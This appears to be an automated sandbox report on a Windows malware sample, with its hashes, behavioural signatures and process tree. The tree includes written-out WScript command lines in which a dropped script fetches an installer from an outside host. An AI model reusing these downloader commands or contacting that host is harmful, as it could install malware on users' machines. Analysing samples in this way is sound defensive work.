Analysis

  • max time kernel
    153s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2022 08:48

General

  • Target

    ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe

  • Size

    184KB

  • MD5

    8bbee466ddc779509f7b5d3ca53b5356

  • SHA1

    f8bb919b6c655d571fb309af43e621b4ac6e63b9

  • SHA256

    ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367

  • SHA512

    c81fbfc36b438b145f9f80ff3ac10b10843f05ed499b8299e6443131df242c7c58795c254ed82baab0b904710c678f54b05344b5c73438e9b60d1d15908d6f11

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3B:/7BSH8zUB+nGESaaRvoB7FJNndnU

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
    "C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
      2⤵
      • Blocklisted process makes network request
      PID:5116
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
      2⤵
      • Blocklisted process makes network request
      PID:3588
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
      2⤵
      • Blocklisted process makes network request
      PID:3164
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
      2⤵
      • Blocklisted process makes network request
      PID:1036

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf7D43.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • memory/1036-136-0x0000000000000000-mapping.dmp

  • memory/3164-135-0x0000000000000000-mapping.dmp

  • memory/3588-134-0x0000000000000000-mapping.dmp

  • memory/5116-132-0x0000000000000000-mapping.dmp